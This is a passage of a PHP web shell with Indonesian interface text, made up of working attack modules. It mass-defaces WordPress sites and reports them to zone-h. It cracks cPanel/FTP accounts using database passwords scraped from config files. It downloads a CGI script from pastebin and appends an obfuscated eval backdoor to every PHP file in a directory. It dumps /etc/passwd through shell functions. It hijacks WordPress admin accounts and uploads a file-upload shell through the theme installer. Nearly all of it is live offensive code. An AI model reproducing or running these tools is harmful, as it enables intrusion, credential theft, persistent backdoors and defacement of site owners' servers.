  3327. echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
  3328. }
  3329. if(!$update OR !$conn OR !$db) {
  3330. echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
  3331. } else {
  3332. echo "<font color=lime>sukses di ganti.</font><br>";
  3333. }
  3334. echo "</div>";
  3335. mysql_close($conn);
  3336. }
  3337. }
  3338. } else {
  3339. echo "<center>
  3340. <h1>Auto Edit Title+Content WordPress</h1>
  3341. <form method='post'>
  3342. DIR Config: <br>
  3343. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  3344. Set Title: <br>
  3345. <input type='text' name='new_title' value='Hacked By Mr.ToKeiChun69' placeholder='New Title'><br><br>
  3346. Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
  3347. <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
  3348. <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
  3349. <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
  3350. </form>
  3351. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  3352. ";
  3353. }
  3354. } elseif($_GET['do'] == 'zoneh') {
  3355. if($_POST['submit']) {
  3356. $domain = explode("\r\n", $_POST['url']);
  3357. $nick = $_POST['nick'];
  3358. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  3359. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  3360. function zoneh($url,$nick) {
  3361. $ch = curl_init("http://www.zone-h.com/notify/single");
  3362. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  3363. curl_setopt($ch, CURLOPT_POST, true);
  3364. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  3365. return curl_exec($ch);
  3366. curl_close($ch);
  3367. }
  3368. foreach($domain as $url) {
  3369. $zoneh = zoneh($url,$nick);
  3370. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  3371. echo "$url -> <font color=lime>OK</font><br>";
  3372. } else {
  3373. echo "$url -> <font color=red>ERROR</font><br>";
  3374. }
  3375. }
  3376. } else {
  3377. echo "<center><form method='post'>
  3378. <u>Defacer</u>: <br>
  3379. <input type='text' name='nick' size='50' value='Mr.ToKeiChun69'><br>
  3380. <u>Domains</u>: <br>
  3381. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  3382. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  3383. </form>";
  3384. }
  3385. echo "</center>";
  3386. }elseif($_GET['do'] == 'cpftp_auto') {
  3387. if($_POST['crack']) {
  3388. $usercp = explode("\r\n", $_POST['user_cp']);
  3389. $passcp = explode("\r\n", $_POST['pass_cp']);
  3390. $i = 0;
  3391. foreach($usercp as $ucp) {
  3392. foreach($passcp as $pcp) {
  3393. if(@mysql_connect('localhost', $ucp, $pcp)) {
  3394. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  3395. } else {
  3396. $_SESSION[$ucp] = "1";
  3397. $_SESSION[$pcp] = "1";
  3398. if($ucp == '' || $pcp == '') {
  3399. //
  3400. } else {
  3401. echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  3402. $ftp_conn = ftp_connect(gethostbyname($_SERVER['HTTP_HOST']));
  3403. $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
  3404. if((!$ftp_login) || (!$ftp_conn)) {
  3405. echo "[+] <font color=red>Login Gagal</font><br><br>";
  3406. } else {
  3407. echo "[+] <font color=lime>Login Sukses</font><br>";
  3408. $fi = htmlspecialchars($_POST['file_deface']);
  3409. $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
  3410. if($deface) {
  3411. $i++;
  3412. echo "[+] <font color=lime>Deface Sukses</font><br>";
  3413. if(function_exists('posix_getpwuid')) {
  3414. $domain_cp = file_get_contents("/etc/named.conf");
  3415. if($domain_cp == '') {
  3416. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  3417. } else {
  3418. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  3419. foreach($domains_cp[1] as $dj) {
  3420. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  3421. $user_cp_url = $user_cp_url['name'];
  3422. if($user_cp_url == $ucp) {
  3423. echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
  3424. break;
  3425. }
  3426. }
  3427. }
  3428. } else {
  3429. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  3430. }
  3431. } else {
  3432. echo "[-] <font color=red>Deface Gagal</font><br><br>";
  3433. }
  3434. }
  3435. //echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  3436. }
  3437. }
  3438. }
  3439. }
  3440. }
  3441. if($i == 0) {
  3442. } else {
  3443. echo "<br>Sukses Deface ".$i." Cpanel by <font color=lime>Janchonx.</font>";
  3444. }
  3445. } else {
  3446. echo "<center>
  3447. <form method='post'>
  3448. Filename: <br>
  3449. <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
  3450. Deface Page: <br>
  3451. <input type='text' name='deface' placeholder='http://www.web-yang-udah-do-deface.com/filemu.php' style='width: 450px;'><br>
  3452. USER: <br>
  3453. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  3454. $_usercp = fopen("/etc/passwd","r");
  3455. while($getu = fgets($_usercp)) {
  3456. if($getu == '' || !$_usercp) {
  3457. echo "<font color=red>Can't read /etc/passwd</font>";
  3458. } else {
  3459. preg_match_all("/(.*?):x:/", $getu, $u);
  3460. foreach($u[1] as $user_cp) {
  3461. if(is_dir("/home/$user_cp/public_html")) {
  3462. echo "$user_cp\n";
  3463. }
  3464. }
  3465. }
  3466. }
  3467. echo "</textarea><br>
  3468. PASS: <br>
  3469. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  3470. function cp_pass($dir) {
  3471. $pass = "";
  3472. $dira = scandir($dir);
  3473. foreach($dira as $dirb) {
  3474. if(!is_file("$dir/$dirb")) continue;
  3475. $ambil = file_get_contents("$dir/$dirb");
  3476. if(preg_match("/WordPress/", $ambil)) {
  3477. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  3478. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  3479. $pass .= ambilkata($ambil,"password = '","'")."\n";
  3480. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  3481. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  3482. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  3483. $pass .= ambilkata($ambil,'password = "','"')."\n";
  3484. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  3485. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  3486. } elseif(preg_match("/client/", $ambil)) {
  3487. preg_match("/password=(.*)/", $ambil, $pass1);
  3488. if(preg_match('/"/', $pass1[1])) {
  3489. $pass1[1] = str_replace('"', "", $pass1[1]);
  3490. $pass .= $pass1[1]."\n";
  3491. }
  3492. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  3493. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  3494. }
  3495. }
  3496. echo $pass;
  3497. }
  3498. $cp_pass = cp_pass($dir);
  3499. echo $cp_pass;
  3500. echo "</textarea><br>
  3501. <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
  3502. </form>
  3503. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  3504. }
  3505. }
  3506. elseif($_GET['do'] == 'cgi') {
  3507. $cgi_dir = mkdir('idx_cgi', 0755);
  3508. $file_cgi = "idx_cgi/cgi.izo";
  3509. $isi_htcgi = "AddHandler cgi-script .izo";
  3510. $htcgi = fopen(".htaccess", "w");
  3511. $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");
  3512. $cgi = fopen($file_cgi, "w");
  3513. fwrite($cgi, $cgi_script);
  3514. fwrite($htcgi, $isi_htcgi);
  3515. chmod($file_cgi, 0755);
  3516. echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
  3517. } elseif($_GET['do'] == 'fake_root') {
  3518. ob_start();
  3519. function reverse($url) {
  3520. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  3521. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  3522. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
  3523. curl_setopt($ch, CURLOPT_HEADER, 0);
  3524. curl_setopt($ch, CURLOPT_POST, 1);
  3525. $resp = curl_exec($ch);
  3526. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  3527. $array = explode(",,", $resp);
  3528. unset($array[0]);
  3529. foreach($array as $lnk) {
  3530. $lnk = "http://$lnk";
  3531. $lnk = str_replace(",", "", $lnk);
  3532. echo $lnk."\n";
  3533. ob_flush();
  3534. flush();
  3535. }
  3536. curl_close($ch);
  3537. }
  3538. function cek($url) {
  3539. $ch = curl_init($url);
  3540. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  3541. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  3542. $resp = curl_exec($ch);
  3543. return $resp;
  3544. }
  3545. $cwd = getcwd();
  3546. $ambil_user = explode("/", $cwd);
  3547. $user = $ambil_user[2];
  3548. if($_POST['reverse']) {
  3549. $site = explode("\r\n", $_POST['url']);
  3550. $file = $_POST['file'];
  3551. foreach($site as $url) {
  3552. $cek = cek("$url/~$user/$file");
  3553. if(preg_match("/hacked/i", $cek)) {
  3554. echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
  3555. }
  3556. }
  3557. } else {
  3558. echo "<center><form method='post'>
  3559. Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
  3560. User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
  3561. Domain: <br>
  3562. <textarea style='width: 450px; height: 250px;' name='url'>";
  3563. reverse($_SERVER['HTTP_HOST']);
  3564. echo "</textarea><br>
  3565. <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
  3566. </form><br>
  3567. NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
  3568. }
  3569. } elseif($_GET['do'] == 'adminer') {
  3570. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  3571. function adminer($url, $isi) {
  3572. $fp = fopen($isi, "w");
  3573. $ch = curl_init();
  3574. curl_setopt($ch, CURLOPT_URL, $url);
  3575. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  3576. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  3577. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  3578. curl_setopt($ch, CURLOPT_FILE, $fp);
  3579. return curl_exec($ch);
  3580. curl_close($ch);
  3581. fclose($fp);
  3582. ob_flush();
  3583. flush();
  3584. }
  3585. if(file_exists('adminer.php')) {
  3586. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  3587. } else {
  3588. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  3589. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  3590. } else {
  3591. echo "<center><font color=red>gagal buat file adminer</font></center>";
  3592. }
  3593. }
  3594. }elseif($_GET['do'] == 'injectcode') {?><center>
  3595. <form method='POST'>
  3596. <table>
  3597. <tr>
  3598. <td width="100" class="title">
  3599. Directory
  3600. </td>
  3601. <td>
  3602. <input type='text' style="width: 400px;" name="pathtomass" value="<?php echo getcwd().$SEPARATOR; ?>" />
  3603. </td>
  3604.  
  3605. </tr>
  3606. <tr>
  3607. <td class="title">
  3608. Mode
  3609. </td>
  3610. <td>
  3611. <select style="width: 400px;" name="mode" class="box">
  3612. <option value="Apender">Apender</option>
  3613. <option value="Overwriter">Overwriter</option>
  3614. </select>
  3615. </td>
  3616. </tr>
  3617. <tr>
  3618. <td class="title">
  3619. File Type
  3620. </td>
  3621. <td>
  3622. <input type="text" class="box" name="filetype" value="php" onBlur="if(this.value=='')this.value='php';" />
  3623. </td>
  3624. </tr>
  3625. <tr>
  3626. <td>Create A backdoor by injecting this code in every php file of current directory</td>
  3627. </tr>
  3628.  
  3629. <tr>
  3630. <td colspan="2">
  3631. <textarea name="injectthis" cols="110" rows="10" class="box"><?php echo base64_decode("PD9waHANCmV2YWwoZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoInkwelRVSWwzZHcySlZrcFVpdFdzVGkxTHpORklyOHJNUzh0SkxFblZTRW9zVGpVemlVOUpUYzVQU2RWSXk4eEpqVTlQTFlsUHpzOHJTYzByS2RaUXlpZ3BLYkRTMXk5SUxDNUpUY3JNMDB2T3o5VXZTaXpYVC9VemN5d3NUTXhXMGdRQzYxb0EiKSkpOw0KPz4="); ?></textarea>
  3632. </td>
  3633. </tr>
  3634. <tr>
  3635. <td rowspan="2">
  3636. <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="submit" class="but" value="Inject "/>
  3637. </td>
  3638. </tr>
  3639. </form>
  3640. </table><div id="showinject"</div> <?php
  3641. $filetype = $_POST['filetype'];
  3642. $mode = "a";
  3643. if($_POST['mode'] == 'Apender')
  3644. $mode = "a";
  3645. if($_POST['mode'] == 'Overwriter')
  3646. $mode = "w";
  3647. if (is_dir($_POST['pathtomass']))
  3648. {
  3649. $lolinject = $_POST['injectthis'];
  3650. $mypath = $_POST['pathtomass'] .$directorysperator. "*.".$filetype;
  3651. if(substr($_POST['pathtomass'], -1) == "\\")
  3652. $mypath = $_POST['pathtomass'] . "*.".$filetype;
  3653. foreach (glob($mypath) as $injectj00)
  3654. {
  3655. if($injectj00 == __FILE__)
  3656. continue;
  3657. $fp=fopen($injectj00,$mode);
  3658. if (fputs($fp,$lolinject))
  3659. echo '<br><font class=txt size=3>'.$injectj00.' was injected<br></font>';
  3660. else
  3661. echo 'failed to inject '.$injectj00.'<br>';
  3662. }
  3663. }
  3664. else
  3665. echo '<b>'.$_POST['pathtomass'].' is not available!</b>';
  3666. }
  3667.  
  3668. elseif($_GET['do'] == 'passwbypass') {
  3669. echo '<center>Bypass etc/passw With:<br>
  3670. <table style="width:50%">
  3671. <tr>
  3672. <td><form method="post"><input type="submit" value="System Function" name="syst"></form></td>
  3673. <td><form method="post"><input type="submit" value="Passthru Function" name="passth"></form></td>
  3674. <td><form method="post"><input type="submit" value="Exec Function" name="ex"></form></td>
  3675. <td><form method="post"><input type="submit" value="Shell_exec Function" name="shex"></form></td>
  3676. <td><form method="post"><input type="submit" value="Posix_getpwuid Function" name="melex"></form></td>
  3677. </tr></table>Bypass User With : <table style="width:50%">
  3678. <tr>
  3679. <td><form method="post"><input type="submit" value="Awk Program" name="awkuser"></form></td>
  3680. <td><form method="post"><input type="submit" value="System Function" name="systuser"></form></td>
  3681. <td><form method="post"><input type="submit" value="Passthru Function" name="passthuser"></form></td>
  3682. <td><form method="post"><input type="submit" value="Exec Function" name="exuser"></form></td>
  3683. <td><form method="post"><input type="submit" value="Shell_exec Function" name="shexuser"></form></td>
  3684. </tr>
  3685. </table><br>';
  3686.  
  3687.  
  3688. if ($_POST['awkuser']) {
  3689. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3690. echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
  3691. echo "</textarea><br>";
  3692. }
  3693. if ($_POST['systuser']) {
  3694. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3695. echo system("ls /var/mail");
  3696. echo "</textarea><br>";
  3697. }
  3698. if ($_POST['passthuser']) {
  3699. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3700. echo passthru("ls /var/mail");
  3701. echo "</textarea><br>";
  3702. }
  3703. if ($_POST['exuser']) {
  3704. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3705. echo exec("ls /var/mail");
  3706. echo "</textarea><br>";
  3707. }
  3708. if ($_POST['shexuser']) {
  3709. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3710. echo shell_exec("ls /var/mail");
  3711. echo "</textarea><br>";
  3712. }
  3713. if($_POST['syst'])
  3714. {
  3715. echo"<textarea class='inputz' cols='65' rows='15'>";
  3716. echo system("cat /etc/passwd");
  3717. echo"</textarea><br><br><b></b><br>";
  3718. }
  3719. if($_POST['passth'])
  3720. {
  3721. echo"<textarea class='inputz' cols='65' rows='15'>";
  3722. echo passthru("cat /etc/passwd");
  3723. echo"</textarea><br><br><b></b><br>";
  3724. }
  3725. if($_POST['ex'])
  3726. {
  3727. echo"<textarea class='inputz' cols='65' rows='15'>";
  3728. echo exec("cat /etc/passwd");
  3729. echo"</textarea><br><br><b></b><br>";
  3730. }
  3731. if($_POST['shex'])
  3732. {
  3733. echo"<textarea class='inputz' cols='65' rows='15'>";
  3734. echo shell_exec("cat /etc/passwd");
  3735. echo"</textarea><br><br><b></b><br>";
  3736. }
  3737. echo '<center>';
  3738. if($_POST['melex'])
  3739. {
  3740. echo"<textarea class='inputz' cols='65' rows='15'>";
  3741. for($uid=0;$uid<60000;$uid++){
  3742. $ara = posix_getpwuid($uid);
  3743. if (!empty($ara)) {
  3744. while (list ($key, $val) = each($ara)){
  3745. print "$val:";
  3746. }
  3747. print "\n";
  3748. }
  3749. }
  3750. echo"</textarea><br><br>";
  3751. }
  3752. //
  3753.  
  3754. //
  3755. } elseif($_GET['do'] == 'auto_dwp') {
  3756. if($_POST['auto_deface_wp']) {
  3757. function anucurl($sites) {
  3758. $ch = curl_init($sites);
  3759. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3760. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3761. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3762. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  3763. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3764. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3765. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3766. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3767. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3768. $data = curl_exec($ch);
  3769. curl_close($ch);
  3770. return $data;
  3771. }
  3772. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  3773. $post = array(
  3774. "log" => "$userr",
  3775. "pwd" => "$pass",
  3776. "rememberme" => "forever",
  3777. "wp-submit" => "$wp_submit",
  3778. "redirect_to" => "$web",
  3779. "testcookie" => "1",
  3780. );
  3781. $ch = curl_init($cek);
  3782. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3783. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3784. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3785. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3786. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3787. curl_setopt($ch, CURLOPT_POST, 1);
  3788. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  3789. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3790. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3791. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3792. $data = curl_exec($ch);
  3793. curl_close($ch);
  3794. return $data;
  3795. }
  3796. $scan = $_POST['link_config'];
  3797. $link_config = scandir($scan);
  3798. $script = htmlspecialchars($_POST['script']);
  3799. $user = "faisa69";
  3800. $pass = "faisa69";
  3801. $passx = md5($pass);
  3802. foreach($link_config as $dir_config) {
  3803. if(!is_file("$scan/$dir_config")) continue;
  3804. $config = file_get_contents("$scan/$dir_config");
  3805. if(preg_match("/WordPress/", $config)) {
  3806. $dbhost = ambilkata($config,"DB_HOST', '","'");
  3807. $dbuser = ambilkata($config,"DB_USER', '","'");
  3808. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3809. $dbname = ambilkata($config,"DB_NAME', '","'");
  3810. $dbprefix = ambilkata($config,"table_prefix = '","'");
  3811. $prefix = $dbprefix."users";
  3812. $option = $dbprefix."options";
  3813. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3814. $db = mysql_select_db($dbname);
  3815. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  3816. $result = mysql_fetch_array($q);
  3817. $id = $result[ID];
  3818. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3819. $result2 = mysql_fetch_array($q2);
  3820. $target = $result2[option_value];
  3821. if($target == '') {
  3822. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  3823. } else {
  3824. echo "[+] $target <br>";
  3825. }
  3826. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  3827. if(!$conn OR !$db OR !$update) {
  3828. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  3829. mysql_close($conn);
  3830. } else {
  3831. $site = "$target/wp-login.php";
  3832. $site2 = "$target/wp-admin/theme-install.php?upload";
  3833. $b1 = anucurl($site2);
  3834. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  3835. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  3836. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  3837. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  3838. $www = "m.php";
  3839. $fp5 = fopen($www,"w");
  3840. fputs($fp5,$upload3);
  3841. $post2 = array(
  3842. "_wpnonce" => "$anu2",
  3843. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  3844. "themezip" => "@$www",
  3845. "install-theme-submit" => "Install Now",
  3846. );
  3847. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  3848. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3849. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3850. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3851. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3852. curl_setopt($ch, CURLOPT_POST, 1);
  3853. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  3854. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3855. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3856. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3857. $data3 = curl_exec($ch);
  3858. curl_close($ch);
  3859. $y = date("Y");
  3860. $m = date("m");
  3861. $namafile = "id.php";
  3862. $fpi = fopen($namafile,"w");
  3863. fputs($fpi,$script);
  3864. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  3865. curl_setopt($ch6, CURLOPT_POST, true);
  3866. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  3867. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  3868. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  3869. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  3870. curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
  3871. $postResult = curl_exec($ch6);
  3872. curl_close($ch6);
  3873. $as = "$target/k.php";
  3874. $bs = anucurl($as);
  3875. if(preg_match("#$script#is", $bs)) {
  3876. echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  3877. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  3878. } else {
  3879. echo "[-] <font color='red'>gagal mepes...</font><br>";
  3880. echo "[!!] coba aja manual: <br>";
  3881. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  3882. echo "[+] username: <font color=lime>$user</font><br>";
  3883. echo "[+] password: <font color=lime>$pass</font><br><br>";
  3884. }
  3885. mysql_close($conn);
  3886. }
  3887. }
  3888. }
  3889. } else {
  3890. echo "<center><h1>WordPress Auto Deface</h1>
  3891. <form method='post'>
  3892. <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
  3893. <input type='text' name='script' height='10' size='50' placeholder='Hacked By Mr.ToKeiChun69' required><br>
  3894. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  3895. </form>
  3896. <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
  3897. </center>";
  3898. }
  3899. } elseif($_GET['do'] == 'auto_dwp2') {
  3900. if($_POST['auto_deface_wp']) {
  3901. function anucurl($sites) {
  3902. $ch = curl_init($sites);
  3903. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3904. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3905. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3906. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  3907. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3908. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3909. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3910. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3911. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  3912. $data = curl_exec($ch);
  3913. curl_close($ch);
  3914. return $data;
  3915. }
  3916. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  3917. $post = array(
  3918. "log" => "$userr",
  3919. "pwd" => "$pass",
  3920. "rememberme" => "forever",
  3921. "wp-submit" => "$wp_submit",
  3922. "redirect_to" => "$web",
  3923. "testcookie" => "1",
  3924. );
  3925. $ch = curl_init($cek);
  3926. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3927. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3928. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3929. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3930. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3931. curl_setopt($ch, CURLOPT_POST, 1);
  3932. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  3933. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3934. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3935. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3936. $data = curl_exec($ch);
  3937. curl_close($ch);
  3938. return $data;
  3939. }
  3940. $link = explode("\r\n", $_POST['link']);
  3941. $script = htmlspecialchars($_POST['script']);
  3942. $user = "indoxploit";
  3943. $pass = "indoxploit";
  3944. $passx = md5($pass);
  3945. foreach($link as $dir_config) {
  3946. $config = anucurl($dir_config);
  3947. $dbhost = ambilkata($config,"DB_HOST', '","'");
  3948. $dbuser = ambilkata($config,"DB_USER', '","'");
  3949. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3950. $dbname = ambilkata($config,"DB_NAME', '","'");
  3951. $dbprefix = ambilkata($config,"table_prefix = '","'");
  3952. $prefix = $dbprefix."users";
  3953. $option = $dbprefix."options";
  3954. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3955. $db = mysql_select_db($dbname);
  3956. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  3957. $result = mysql_fetch_array($q);
  3958. $id = $result[ID];
  3959. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3960. $result2 = mysql_fetch_array($q2);
  3961. $target = $result2[option_value];
  3962. if($target == '') {
  3963. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  3964. } else {
  3965. echo "[+] $target <br>";
  3966. }
